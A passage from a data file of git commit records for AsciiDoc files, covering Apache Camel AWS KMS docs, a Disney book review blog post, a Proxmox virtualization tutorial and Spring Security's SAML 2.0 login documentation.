.to(\"aws-kms:\/\/test?kmsClient=#amazonKmsClient&operation=listKeys\")\n--------------------------------------------------------------------------------\n\n== Automatic detection of AWSKMS client in registry\n\nThe component is capable of detecting the presence of an AWSKMS bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\nDependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws-kms<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d82f9f3df6ef3654d557c8c7f4037aa1161f9b65","subject":"Update 2016-10-18-Book-Review-Progress-City-Primer.adoc","message":"Update 2016-10-18-Book-Review-Progress-City-Primer.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-10-18-Book-Review-Progress-City-Primer.adoc","new_file":"_posts\/2016-10-18-Book-Review-Progress-City-Primer.adoc","new_contents":"= Book Review: Progress City Primer\n:hp-tags: Reviews, Disney World, Disneyland\n:hp-image: covers\/ProgressCityPrimer.png\n\nimage::covers\/ProgressCityPrimer.png[caption=\"Progress City Primer by Michael Crawford\", link=\"https:\/\/www.amazon.com\/gp\/product\/0986205060\/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0986205060&linkCode=as2&tag=habumacom-20&linkId=bb1ea4f5992ed4690bbad1c892ec99a3\"]\n\nIf you're anything like me, you enjoy reading, but struggle to find books that both capture and hold your attention. As a Disney fanatic, however, I've discovered that there are countless books available about Walt Disney, the Walt Disney Company, and the Disney Parks. On the off-chance that some of our _MouseGuests_ readers are looking for a good book to read, I though I'd write some book reviews on this blog, sharing my thoughts on some of the best Disney books I find.\n\nAmong the many books on Disney are several books that delve into Disney history, including one that I finished recently, https:\/\/www.amazon.com\/gp\/product\/0986205060\/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0986205060&linkCode=as2&tag=habumacom-20&linkId=bb1ea4f5992ed4690bbad1c892ec99a3[_Progress City Primer: Stories, Secrets, and Silliness from the Many Worlds of Walt Disney_ by Michael Crawford].\n\nWalt Disney was a storyteller. And virtually everything that has the Disney name on it, from the movies to the theme parks, is wrapped in a story. So it seems fitting that there be a book that tells stories about Disney. That's exactly what _Progress City Primer_ is: a collection of stories. Stories about Walt, stories about the imagineers, and stories about Disney's Parks.\n\nThe book doesn't follow a serial flow. Instead, it is structured such that you can pick it up and start reading at any chapter. (I read it front to back, but that was merely by choice.) Although all of the stories are interesting and provide insight into Walt and the history of the Disney company, I rather enjoyed the stories about Walt himself near the beginning of the book the most. Some of the best stories are \"The Lake Buena Vista STOLport\", \"Walt Disney vs. the Air Pirates\", and \"Pooh for President\", all collected and retold brilliantly by the author. My favorite story in _Progress City Primer_ is a humorous story about Walt Disney, Herb Ryman, and 49 tiny elephants in \"Walt's Elephants\". Although it's one of the shortest (if not _the_ shortest) story in the book, this one story alone is worth the price of the book.\n\nI found _Progress City Primer_ difficult to put down and found myself in multi-chapter marathon reading sessions on airplanes as I travel. My only complaint is that after 33 fascinating stories, the book ended and I was wanting more Disney stories. As a parting gift, there is an appendix that collects several Disney-related recipes, including a recipe for the iconic strawberry shortcake from the _Hoop-Dee-Doo Musical Revue_ at Walt Disney World's Fort Wilderness.\n\nI highly recommend _Progress City Primer_ to any reader who is even a marginal Disney fan. You won't be disappointed.\n\nHave you read _Progress City Primer_? What did you think? What Disney books can you recommend? Leave a comment and let us know!","old_contents":"= Book Review: Progress City Primer\n:hp-tags: Reviews, Disney World, Disneyland\n:hp-image: covers\/ProgressCityPrimer.png\n\nimage::covers\/ProgressCityPrimer.png[caption=\"Progress City Primer by Michael Crawford\", link=\"https:\/\/www.amazon.com\/gp\/product\/0986205060\/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0986205060&linkCode=as2&tag=habumacom-20&linkId=bb1ea4f5992ed4690bbad1c892ec99a3\"]\n\nIf you're anything like me, you enjoy reading, but struggle to find books that both capture and hold your attention. As a Disney fanatic, however, I've discovered that there are countless books available about Walt Disney, the Walt Disney Company, and the Disney Parks. On the off-chance that some of our _MouseGuests_ readers are looking for a good book to read, I though I'd write some book reviews on this blog, sharing my thoughts on some of the best Disney books I find.\n\nAmong the many books on Disney are several books that delve into Disney history, including one that I finished recently, https:\/\/www.amazon.com\/gp\/product\/0986205060\/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0986205060&linkCode=as2&tag=habumacom-20&linkId=bb1ea4f5992ed4690bbad1c892ec99a3[_Progress City Primer: Stories, Secrets, and Silliness from the Many Worlds of Walt Disney_ by Michael Crawford].\n\nWalt Disney was a storyteller. And virtually everything that has the Disney name on it, from the movies to the theme parks, is wrapped in a story. So it seems fitting that there be a book that tells stories about Disney. That's exactly what _Progress City Primer_ is: a collection of stories. Stories about Walt, stories about the imagineers, and stories about Disney's Parks.\n\nThe book doesn't follow a serial flow. Instead, it is structured such that you can pick it up and start reading at any chapter. (I, however, read it front to back, but that was merely by choice.) Although all of the stories are interesting and provide insight into Walt and the history of the Disney company, I rather enjoyed the stories about Walt himself near the beginning of the book the most. Some of the best stories are \"The Lake Buena Vista STOLport\", \"Walt Disney vs. the Air Pirates\", and \"Pooh for President\", all collected and retold brilliantly by the author. My favorite story in _Progress City Primer_ is a humorous story about Walt Disney, Herb Ryman, and 49 tiny elephants in \"Walt's Elephants\". Although it's one of the shortest (if not _the_ shortest) story in the book, this one story alone is worth the price of the book.\n\nI found _Progress City Primer_ difficult to put down and found myself in multi-chapter marathon reading sessions on airplanes as I travel. My only complaint is that after 33 fascinating stories, the book ended and I was wanting more Disney stories. As a parting gift, there is an appendix that collects several Disney-related recipes, including a recipe for the iconic strawberry shortcake from the _Hoop-Dee-Doo Musical Revue_ at Walt Disney World's Fort Wilderness.\n\nI highly recommend _Progress City Primer_ to any reader who is even a marginal Disney fan. You won't be disappointed.\n\nHave you read _Progress City Primer_? What did you think? What Disney books can you recommend? Leave a comment and let us know!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0b96467c82feed6660b24579458ca1bd6a26c57e","subject":"Update 2017-04-23-Server-Virtualization-Management.adoc","message":"Update 2017-04-23-Server-Virtualization-Management.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-23-Server-Virtualization-Management.adoc","new_file":"_posts\/2017-04-23-Server-Virtualization-Management.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= PVE: Virtualization for Work and Play (Part 1)\n:hp-alt-title: Server Virtualization Management\n:hp-tags: Blog, Open_Source, Technology\n:icons: image\n:linkattrs:\n:toc: macro \n:published_at: 2017-04-23\n\n== The Plan...\n\nSay we want a powerful \"bang for the buck\" home server for games _and_ other system-intensive pursuits. We may want to run powerful analytics applications which would undoubtedly require Linux, but we may also want to run Windows applications. We may want near native 2D and 3D graphics performance inside the guest operating system (OS) while making dual-booting obsolete. Finally, we may want to do all of that from the comfort of our couch using a Windows, Linux or Mac laptop. Lets do it! \n\ntoc::[]\n\n== Introduction\n\nlink:https:\/\/en.wikipedia.org\/wiki\/X86_virtualization[Hardware virtualization^] allows multiple operating systems to simultaneously share processor resources. With the link:https:\/\/opensource.org\/[open source^] server management solution, link:https:\/\/www.proxmox.com\/en\/[Proxmox Virtual Environment (PVE)^], we can leverage hardware virtualization to achieve our goals. PVE enables the creation of multiple virtual OS \"servers\" via a Web GUI; as many as our hardware setup will allow. This guide will document the setup of PVE on the following hardware:\n\n* AMD Ryzen 7 1600 (8 cores, 16 threads @ 3.7GHz)\n* 64GB 2400MHz DDR4\n* Boot Drive: 1x 512GB NVMe SSD \n* Storage (Striped-mirrored ZFS):\n** 2x 1TB SATA SSD (striped)\n** 1x 2TB 7200rpm mechanical drives (mirrored)\n\nSo what's the difference between a VM and a container anyway, and how do we choose between them? A VM is computer software that emulates a particular computer hardware system and requires an OS to function. In other words, VMs \"pretend\" to be an actual computer of the type that _we_ specify and will need to have a Guest OS like Windows or Linux running. Containers are software that emulates the Host OS, to enable software to run predictably.\n\n[cols=\"1, 8a, 1\"]\n|===\n|\n|Diagram 1: Comparison of a VM & Container on One Machine\nimage:Server-Virtualization-Management\/vms-and-containers.png[vms-cnt]\n|\n|===\n\nIf we want to run multiple applications on one server, to have increased security, or to run an operating system that is different from our host system, then a VM is our choice. To run different versions of an application (i.e RStudio) and validate reproducibility and reliability, then we want to use containers. Compared to VMs, containers are quicker, \"lighter weight\" and more transient so they can be readily packaged, shared, and moved to other hardware.\n\n== Hardware Considerations\n\nOur CPU and motherboard must support \"virtualization\u201d (SVM) and IOMMU, which needs to be enabled in firmware for resource sharing. Also, we should have 32GB of RAM or more, so that we can reserve at least 16GB for a single virtual machine (VM) and still have enough memory left over for PVE and potentially other VMs running simultaneously.\n\nWhile most of our computer hardware can be shared between multiple VMs, the graphics card (GPU) may not readily be shared, so we'll need at least two GPUs:\n\n. One GPU for PVE (the host);\n. One powerful GPU for our VMs (the guests: Windows, Linux, etc.).\n\n== Software Considerations\n\nlink:https:\/\/jannikjung.me\/proxmox-ve-5-0-beta1\/[PVE 5.0^] is based in link:https:\/\/wiki.debian.org\/DebianStretch[Debian Linux (Stretch)^]. Since our Ryzen hardware is rather new, our host system needs to have a Linux kernel version 4.10 or later. Although in beta at the time of this writing, PVE 5.0 has better support for Ryzen than PVE 4.4.\n\nPVE natively supports both link:https:\/\/www.linux-kvm.org\/page\/Main_Page[KVM^] for hardware virtualization and link:https:\/\/linuxcontainers.org\/lxc\/introduction\/[LXC containers^] for Linux system virtualization. Since the guest systems can run under hardware virtualization, we get some added bonuses. For example, we can benefit from Ryzen hardware and still get link:http:\/\/www.pcworld.com\/article\/3189990\/windows\/microsoft-blocks-kaby-lake-and-ryzen-pcs-from-windows-7-81-updates.html[Windows 7 updates^]. We would need to identify our Windows link:https:\/\/www.nextofwindows.com\/the-best-way-to-uniquely-identify-a-windows-machine[Universally Unique Identifier (UUID)^] so that it may be identical on our VM. Otherwise, Microsoft may think that we have a new version of Windows that needs to be registered.\n\nWe will use link:https:\/\/github.com\/zfsonlinux\/zfs\/wiki\/faq[ZFS^], a storage platform that encompasses the functionality of traditional filesystems, volume managers, and more, with consistent reliability, and performance. Our ZFS installation will be compressed and striped: our two SSD drives will run in parallel and require less storage space, which improves read\/write performance. In addition, our ZFS will be mirrored: our SSD drives will be cloned so that we have a backup in case of drive failure.\n\n[cols=\"1, 8a\"]\n|===\n^.^|image:\/images\/icons\/lightbulb.png[icon=\"tip\",size=\"4x\",width=56]\n|*About That*: KVM supports multiple disk formats; raw images, the native QEMU format (qcow2), VMware format, and many more. When working with ZFS on PVE, we need to use raw images. It may not seem obvious at first, but we can easily convert an existing KVM file from one format to a raw image. Near the end of this guide, we'll cover the process to convert a qcow2 format to the required PVE raw image.\n|===\n\n== Next Steps...\n\nThis is Part 1 of a multipart tutorial, and a work in progress. As I complete each part, I'll update the links. Roughly speaking the next parts are as follows:\n\n* link:\/2017\/04\/25\/Server-Virtualization-Management-Part2.html[Part 2: Getting Started]\n* Part 3: System Optimization\n","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= PVE: Virtualization for Work and Play (Part 1)\n:hp-alt-title: Server Virtualization Management\n:hp-tags: Blog, Open_Source, Technology\n:icons: image\n:linkattrs:\n:toc: macro \n:published_at: 2017-04-23\n\n== The Plan...\n\nSay we want a powerful \"bang for the buck\" home server for games _and_ other system-intensive pursuits. We may want to run powerful analytics applications which would undoubtedly require Linux, but we may also want to run Windows applications. We may want near native 2D and 3D graphics performance inside the guest operating system (OS) while making dual-booting obsolete. Finally, we may want to do all of that from the comfort of our couch using a Windows, Linux or Mac laptop. Lets do it! \n\ntoc::[]\n\n== Introduction\n\nlink:https:\/\/en.wikipedia.org\/wiki\/X86_virtualization[Hardware virtualization^] allows multiple operating systems to simultaneously share processor resources. With the link:https:\/\/opensource.org\/[open source^] server management solution, link:https:\/\/www.proxmox.com\/en\/[Proxmox Virtual Environment (PVE)^], we can leverage hardware virtualization to achieve our goals. PVE enables the creation of multiple virtual OS \"servers\" via a Web GUI; as many as our hardware setup will allow. This guide will document the setup of PVE on the following hardware:\n\n* AMD Ryzen 7 1600 (8 cores, 16 threads @ 3.7GHz)\n* 64GB 2400MHz DDR4\n* Boot Drive: 1x 512GB NVMe SSD \n* Storage (Striped-mirrored ZFS):\n** 2x 1TB SATA SSD (striped)\n** 1x 2TB 7200rpm mechanical drives (mirrored)\n\nSo what's the difference between a VM and a container anyway, and how do we choose between them? A VM is computer software that emulates a particular computer hardware system and requires an OS to function. In other words, VMs \"pretend\" to be an actual computer of the type that _we_ specify and will need to have a Guest OS like Windows or Linux running. Containers are software that emulates the Host OS, to enable software to run predictably.\n\n[cols=\"1, 8a, 1\"]\n|===\n|\n|Diagram 1: Comparison of a VM & Container on One Machine\nimage:Server-Virtualization-Management\/vms-and-containers.png[vms-cnt]\n|\n|===\n\nIf we want to run multiple applications on one server, to have increased security, or to run an operating system that is different from our host system, then a VM is our choice. To run different versions of an application (i.e RStudio) and validate reproducibility and reliability, then we want to use containers. Compared to VMs, containers are quicker, \"lighter weight\" and more transient so they can be readily packaged, shared, and moved to other hardware.\n\n== Hardware Considerations\n\nOur CPU and motherboard must support \"virtualization\u201d (SVM) and IOMMU, which needs to be enabled in firmware for resource sharing. Also, we should have 32GB of RAM or more, so that we can reserve at least 16GB for a single virtual machine (VM) and still have enough memory left over for PVE and potentially other VMs running simultaneously.\n\nWhile most of our computer hardware can be shared between multiple VMs, the graphics card (GPU) may not readily be shared, so we'll need at least two GPUs:\n\n. One GPU for PVE (the host);\n. One powerful GPU for our VMs (the guests: Windows, Linux, etc.).\n\n== Software Considerations\n\nlink:https:\/\/jannikjung.me\/proxmox-ve-5-0-beta1\/[PVE 5.0^] is based in link:https:\/\/wiki.debian.org\/DebianStretch[Debian Linux (Stretch)^]. Since our Ryzen hardware is rather new, our host system needs to have a Linux kernel version 4.10 or later. Although in beta at the time of this writing, PVE 5.0 has better support for Ryzen than PVE 4.4.\n\nPVE natively supports both link:https:\/\/www.linux-kvm.org\/page\/Main_Page[KVM^] for hardware virtualization and link:https:\/\/linuxcontainers.org\/lxc\/introduction\/[LXC containers^] for Linux system virtualization. Since the guest systems can run under hardware virtualization, we get some added bonuses. For example, we can benefit from Ryzen hardware and still get link:http:\/\/www.pcworld.com\/article\/3189990\/windows\/microsoft-blocks-kaby-lake-and-ryzen-pcs-from-windows-7-81-updates.html[Windows 7 updates^]. We would need to identify our Windows link:https:\/\/www.nextofwindows.com\/the-best-way-to-uniquely-identify-a-windows-machine[Universally Unique Identifier (UUID)^] so that it may be identical on our VM. Otherwise, Microsoft may think that we have a new version of Windows that needs to be registered.\n\nWe will use link:https:\/\/github.com\/zfsonlinux\/zfs\/wiki\/faq[ZFS^], a storage platform that encompasses the functionality of traditional filesystems, volume managers, and more, with consistent reliability, and performance. Our ZFS installation will be compressed and striped: our two SSD drives will run in parallel and require less storage space, which improves read\/write performance. In addition, our ZFS will be mirrored: our SSD drives will be cloned so that we have a backup in case of drive failure.\n\n[cols=\"1, 8a\"]\n|===\n^.^|image:\/images\/icons\/lightbulb.png[icon=\"tip\",size=\"4x\",width=56]\n|*About That*: KVM supports multiple disk formats; raw images, the native QEMU format (qcow2), VMware format, and many more. When working with ZFS on PVE, we need to use raw images. It may not seem obvious at first, but we can easily convert an existing KVM file from one format to a raw image. Near the end of this guide, we'll cover the process to convert a qcow2 format to the required PVE raw image.\n|===\n\n== Next Steps...\n\nThis is Part 1 of a multipart tutorial, and a work in progress. As I complete each part, I'll update the links. Roughly speaking the next parts are as follows:\n\n* link:\/2017\/04\/25\/Server-Virtualization-Management-Part2.html[Part 2: Getting Started]\n* Part 3: System Optimization\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c495ff8759088499dd6f84611b7d60072dec3adc","subject":"Fix AuthnRequestConverter Sample Typos","message":"Fix AuthnRequestConverter Sample Typos\n\nCloses gh-10364\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/saml2\/saml2-login.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/saml2\/saml2-login.adoc","new_contents":"\n[[servlet-saml2login]]\n== SAML 2.0 Login\n:figures: images\/servlet\/saml2\n:icondir: images\/icons\n\nThe SAML 2.0 Login feature provides an application with the capability to act as a SAML 2.0 Relying Party, having users https:\/\/wiki.shibboleth.net\/confluence\/display\/CONCEPT\/FlowsAndConfig[log in] to the application by using their existing account at a SAML 2.0 Asserting Party (Okta, ADFS, etc).\n\nNOTE: SAML 2.0 Login is implemented by using the *Web Browser SSO Profile*, as specified in\nhttps:\/\/www.oasis-open.org\/committees\/download.php\/35389\/sstc-saml-profiles-errata-2.0-wd-06-diff.pdf#page=15[SAML 2 Profiles].\n\n[[servlet-saml2login-spring-security-history]]\nSince 2009, support for relying parties has existed as an https:\/\/github.com\/spring-projects\/spring-security-saml\/tree\/1e013b07a7772defd6a26fcfae187c9bf661ee8f#spring-saml[extension project].\nIn 2019, the process began to port that into https:\/\/github.com\/spring-projects\/spring-security[Spring Security] proper.\nThis process is similar to the one started in 2017 for <<oauth2,Spring Security's OAuth 2.0 support>>.\n\n[NOTE]\n====\nA working sample for {gh-samples-url}\/servlet\/spring-boot\/java\/saml2-login[SAML 2.0 Login] is available in the {gh-samples-url}[Spring Security Samples repository].\n====\n\nLet's take a look at how SAML 2.0 Relying Party Authentication works within Spring Security.\nFirst, we see that, like <<oauth2login, OAuth 2.0 Login>>, Spring Security takes the user to a third-party for performing authentication.\nIt does this through a series of redirects.\n\n.Redirecting to Asserting Party Authentication\nimage::{figures}\/saml2webssoauthenticationrequestfilter.png[]\n\nThe figure above builds off our <<servlet-securityfilterchain,`SecurityFilterChain`>> and <<servlet-authentication-abstractprocessingfilter, `AbstractAuthenticationProcessingFilter`>> diagrams:\n\nimage:{icondir}\/number_1.png[] First, a user makes an unauthenticated request to the resource `\/private` for which it is not authorized.\n\nimage:{icondir}\/number_2.png[] Spring Security's <<servlet-authorization-filtersecurityinterceptor,`FilterSecurityInterceptor`>> indicates that the unauthenticated request is __Denied__ by throwing an `AccessDeniedException`.\n\nimage:{icondir}\/number_3.png[] Since the user lacks authorization, the <<servlet-exceptiontranslationfilter,`ExceptionTranslationFilter`>> initiates __Start Authentication__.\nThe configured <<servlet-authentication-authenticationentrypoint,`AuthenticationEntryPoint`>> is an instance of {security-api-url}org\/springframework\/security\/web\/authentication\/LoginUrlAuthenticationEntryPoint.html[`LoginUrlAuthenticationEntryPoint`] which redirects to <<servlet-saml2login-sp-initiated-factory,the `<saml2:AuthnRequest>` generating endpoint>>, `Saml2WebSsoAuthenticationRequestFilter`.\nOr, if you've <<servlet-saml2login-relyingpartyregistrationrepository,configured more than one asserting party>>, it will first redirect to a picker page.\n\nimage:{icondir}\/number_4.png[] Next, the `Saml2WebSsoAuthenticationRequestFilter` creates, signs, serializes, and encodes a `<saml2:AuthnRequest>` using its configured <<servlet-saml2login-sp-initiated-factory,`Saml2AuthenticationRequestFactory`>>.\n\nimage:{icondir}\/number_5.png[] Then, the browser takes this `<saml2:AuthnRequest>` and presents it to the asserting party.\nThe asserting party attempts to authentication the user.\nIf successful, it will return a `<saml2:Response>` back to the browser.\n\nimage:{icondir}\/number_6.png[] The browser then POSTs the `<saml2:Response>` to the assertion consumer service endpoint.\n\n[[servlet-saml2login-authentication-saml2webssoauthenticationfilter]]\n.Authenticating a `<saml2:Response>`\nimage::{figures}\/saml2webssoauthenticationfilter.png[]\n\nThe figure builds off our <<servlet-securityfilterchain,`SecurityFilterChain`>> diagram.\n\nimage:{icondir}\/number_1.png[] When the browser submits a `<saml2:Response>` to the application, it <<servlet-saml2login-authenticate-responses, delegates to `Saml2WebSsoAuthenticationFilter`>>.\nThis filter calls its configured `AuthenticationConverter` to create a `Saml2AuthenticationToken` by extracting the response from the `HttpServletRequest`.\nThis converter additionally resolves the <<servlet-saml2login-relyingpartyregistration, `RelyingPartyRegistration`>> and supplies it to `Saml2AuthenticationToken`.\n\nimage:{icondir}\/number_2.png[] Next, the filter passes the token to its configured <<servlet-authentication-providermanager,`AuthenticationManager`>>.\nBy default, it will use the <<servlet-saml2login-architecture,`OpenSamlAuthenticationProvider`>>.\n\nimage:{icondir}\/number_3.png[] If authentication fails, then __Failure__\n\n* The <<servlet-authentication-securitycontextholder, `SecurityContextHolder`>> is cleared out.\n* The <<servlet-authentication-authenticationentrypoint,`AuthenticationEntryPoint`>> is invoked to restart the authentication process.\n\nimage:{icondir}\/number_4.png[] If authentication is successful, then __Success__.\n\n* The <<servlet-authentication-authentication, `Authentication`>> is set on the <<servlet-authentication-securitycontextholder, `SecurityContextHolder`>>.\n* The `Saml2WebSsoAuthenticationFilter` invokes `FilterChain#doFilter(request,response)` to continue with the rest of the application logic.\n\n[[servlet-saml2login-minimaldependencies]]\n=== Minimal Dependencies\n\nSAML 2.0 service provider support resides in `spring-security-saml2-service-provider`.\nIt builds off of the OpenSAML library.\n\n[[servlet-saml2login-minimalconfiguration]]\n=== Minimal Configuration\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a service provider consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the necessary asserting party metadata.\n\n[NOTE]\nAlso, this presupposes that you've already <<servlet-saml2login-metadata, registered the relying party with your asserting party>>.\n\n==== Specifying Identity Provider Metadata\n\nIn a Spring Boot application, to specify an identity provider's metadata, simply do:\n\n[source,yml]\n----\nspring:\n security:\n saml2:\n relyingparty:\n registration:\n adfs:\n identityprovider:\n entity-id: https:\/\/idp.example.com\/issuer\n verification.credentials:\n - certificate-location: \"classpath:idp.crt\"\n singlesignon.url: https:\/\/idp.example.com\/issuer\/sso\n singlesignon.sign-request: false\n----\n\nwhere\n\n* `https:\/\/idp.example.com\/issuer` is the value contained in the `Issuer` attribute of the SAML responses that the identity provider will issue\n* `classpath:idp.crt` is the location on the classpath for the identity provider's certificate for verifying SAML responses, and\n* `https:\/\/idp.example.com\/issuer\/sso` is the endpoint where the identity provider is expecting `AuthnRequest` s.\n\nAnd that's it!\n\n[NOTE]\nIdentity Provider and Asserting Party are synonymous, as are Service Provider and Relying Party.\nThese are frequently abbreviated as AP and RP, respectively.\n\n==== Runtime Expectations\n\nAs configured above, the application processes any `+POST \/login\/saml2\/sso\/{registrationId}+` request containing a `SAMLResponse` parameter:\n\n[source,html]\n----\nPOST \/login\/saml2\/sso\/adfs HTTP\/1.1\n\nSAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZ...\n----\n\nThere are two ways to see induce your asserting party to generate a `SAMLResponse`:\n\n* First, you can navigate to your asserting party.\nIt likely has some kind of link or button for each registered relying party that you can click to send the `SAMLResponse`.\n* Second, you can navigate to a protected page in your app, for example, `http:\/\/localhost:8080`.\nYour app then redirects to the configured asserting party which then sends the `SAMLResponse`.\n\nFrom here, consider jumping to:\n\n* <<servlet-saml2login-architecture,How SAML 2.0 Login Integrates with OpenSAML>>\n* <<servlet-saml2login-authenticatedprincipal,How to Use the `Saml2AuthenticatedPrincipal`>>\n* <<servlet-saml2login-sansboot,How to Override or Replace Spring Boot's Auto Configuration>>\n\n[[servlet-saml2login-architecture]]\n=== How SAML 2.0 Login Integrates with OpenSAML\n\nSpring Security's SAML 2.0 support has a couple of design goals:\n\n* First, rely on a library for SAML 2.0 operations and domain objects.\nTo achieve this, Spring Security uses OpenSAML.\n* Second, ensure this library is not required when using Spring Security's SAML support.\nTo achieve this, any interfaces or classes where Spring Security uses OpenSAML in the contract remain encapsulated.\nThis makes it possible for you to switch out OpenSAML for some other library or even an unsupported version of OpenSAML.\n\nAs a natural outcome of the above two goals, Spring Security's SAML API is quite small relative to other modules.\nInstead, classes like `OpenSamlAuthenticationRequestFactory` and `OpenSamlAuthenticationProvider` expose `Converter` s that customize various steps in the authentication process.\n\nFor example, once your application receives a `SAMLResponse` and delegates to `Saml2WebSsoAuthenticationFilter`, the filter will delegate to `OpenSamlAuthenticationProvider`.\n\n.Authenticating an OpenSAML `Response`\nimage:{figures}\/opensamlauthenticationprovider.png[]\n\nThis figure builds off of the <<servlet-saml2login-authentication-saml2webssoauthenticationfilter,`Saml2WebSsoAuthenticationFilter` diagram>>.\n\nimage:{icondir}\/number_1.png[] The `Saml2WebSsoAuthenticationFilter` formulates the `Saml2AuthenticationToken` and invokes the <<servlet-authentication-providermanager,`AuthenticationManager`>>.\n\nimage:{icondir}\/number_2.png[] The <<servlet-authentication-providermanager,`AuthenticationManager`>> invokes the `OpenSamlAuthenticationProvider`.\n\nimage:{icondir}\/number_3.png[] The authentication provider deserializes the response into an OpenSAML `Response` and checks its signature.\nIf the signature is invalid, authentication fails.\n\nimage:{icondir}\/number_4.png[] Then, the provider <<servlet-saml2login-opensamlauthenticationprovider-decryption,decrypts any `EncryptedAssertion` elements>>.\nIf any decryptions fail, authentication fails.\n\nimage:{icondir}\/number_5.png[] Next, the provider validates the response's `Issuer` and `Destination` values.\nIf they don't match what's in the `RelyingPartyRegistration`, authentication fails.\n\nimage:{icondir}\/number_6.png[] After that, the provider verifies the signature of each `Assertion`.\nIf any signature is invalid, authentication fails.\nAlso, if neither the response nor the assertions have signatures, authentication fails.\nEither the response or all the assertions must have signatures.\n\nimage:{icondir}\/number_7.png[] Then, the provider <<servlet-saml2login-opensamlauthenticationprovider-decryption,decrypts any `EncryptedID` or `EncryptedAttribute` elements>>.\nIf any decryptions fail, authentication fails.\n\nimage:{icondir}\/number_8.png[] Next, the provider validates each assertion's `ExpiresAt` and `NotBefore` timestamps, the `<Subject>` and any `<AudienceRestriction>` conditions.\nIf any validations fail, authentication fails.\n\nimage:{icondir}\/number_9.png[] Following that, the provider takes the first assertion's `AttributeStatement` and maps it to a `Map<String, List<Object>>`.\nIt also grants the `ROLE_USER` granted authority.\n\nimage:{icondir}\/number_10.png[] And finally, it takes the `NameID` from the first assertion, the `Map` of attributes, and the `GrantedAuthority` and constructs a `Saml2AuthenticatedPrincipal`.\nThen, it places that principal and the authorities into a `Saml2Authentication`.\n\nThe resulting `Authentication#getPrincipal` is a Spring Security `Saml2AuthenticatedPrincipal` object, and `Authentication#getName` maps to the first assertion's `NameID` element.\n\n[[servlet-saml2login-opensaml-customization]]\n==== Customizing OpenSAML Configuration\n\nAny class that uses both Spring Security and OpenSAML should statically initialize `OpenSamlInitializationService` at the beginning of the class, like so:\n\n[source,java]\n----\nstatic {\n\tOpenSamlInitializationService.initialize();\n}\n----\n\nThis replaces OpenSAML's `InitializationService#initialize`.\n\nOccasionally, it can be valuable to customize how OpenSAML builds, marshalls, and unmarshalls SAML objects.\nIn these circumstances, you may instead want to call `OpenSamlInitializationService#requireInitialize(Consumer)` that gives you access to OpenSAML's `XMLObjectProviderFactory`.\n\nFor example, when sending an unsigned AuthNRequest, you may want to force reauthentication.\nIn that case, you can register your own `AuthnRequestMarshaller`, like so:\n\n[source,java]\n----\nstatic {\n\tOpenSamlInitializationService.requireInitialize(factory -> {\n\t\tAuthnRequestMarshaller marshaller = new AuthnRequestMarshaller() {\n\t\t\t@Override\n public Element marshall(XMLObject object, Element element) throws MarshallingException {\n\t\t\t\tconfigureAuthnRequest((AuthnRequest) object);\n\t\t\t\treturn super.marshall(object, element);\n }\n\n public Element marshall(XMLObject object, Document document) throws MarshallingException {\n\t\t\t\tconfigureAuthnRequest((AuthnRequest) object);\n\t\t\t\treturn super.marshall(object, document);\n }\n\n private void configureAuthnRequest(AuthnRequest authnRequest) {\n\t\t\t\tauthnRequest.setForceAuthN(true);\n }\n\t\t}\n\n\t factory.getMarshallerFactory().registerMarshaller(AuthnRequest.DEFAULT_ELEMENT_NAME, marshaller);\n\t});\n}\n----\n\nThe `requireInitialize` method may only be called once per application instance.\n\n[[servlet-saml2login-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates for a relying party.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a relying party.\nWhen including `spring-security-saml2-service-provider`, the `WebSecurityConfigurerAdapter` looks like:\n\n.Default JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .saml2Login(withDefaults());\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nfun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n saml2Login { }\n 